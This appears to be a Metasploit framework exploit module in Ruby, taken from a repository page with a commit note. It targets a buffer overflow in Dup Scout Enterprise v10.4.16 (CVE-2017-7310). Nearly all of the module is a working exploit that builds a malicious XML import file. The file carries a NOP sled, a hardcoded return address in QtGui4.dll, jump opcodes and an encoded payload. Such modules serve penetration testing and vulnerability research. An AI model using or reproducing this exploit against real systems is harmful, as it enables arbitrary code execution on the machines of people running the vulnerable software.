Jacob Robles
bc18389284
Update the documentation based on analysis of the vulnerability. Slight modifications to the exploit module as well to reduce the size of the generated file and reduce bad characters.
70 lines
1.8 KiB
Ruby
70 lines
1.8 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
include Msf::Exploit::Remote::Seh
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow',
|
|
'Description' => %q(
|
|
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
|
|
by using the import command option to import a specially crafted xml file.
|
|
),
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Daniel Teixeira'
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2017-7310' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'seh',
|
|
'DisablePayloadHandler' => 'true'
|
|
},
|
|
'Platform' => 'win',
|
|
'Payload' =>
|
|
{
|
|
'BadChars' => "\x27",
|
|
'StackAdjustment' => -3500
|
|
},
|
|
'Targets' =>
|
|
[
|
|
['Windows Universal', { 'Ret' => 0x651BB77A } ] # JMP ESP [QtGui4.dll]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Mar 29 2017',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
|
|
])
|
|
end
|
|
|
|
def exploit
|
|
esp = "\x8d\x44\x24\x14" #LEA EAX, [ESP+14h]
|
|
jmp = "\xff\xe0" # JMP EAX
|
|
|
|
buf = "<?xml ?><a name='"
|
|
buf << make_nops(1560)
|
|
buf << [target.ret].pack('V')
|
|
buf << make_nops(16)
|
|
buf << esp
|
|
buf << jmp
|
|
buf << make_nops(14)
|
|
buf << payload.encoded
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
|
file_create(buf)
|
|
end
|
|
end
|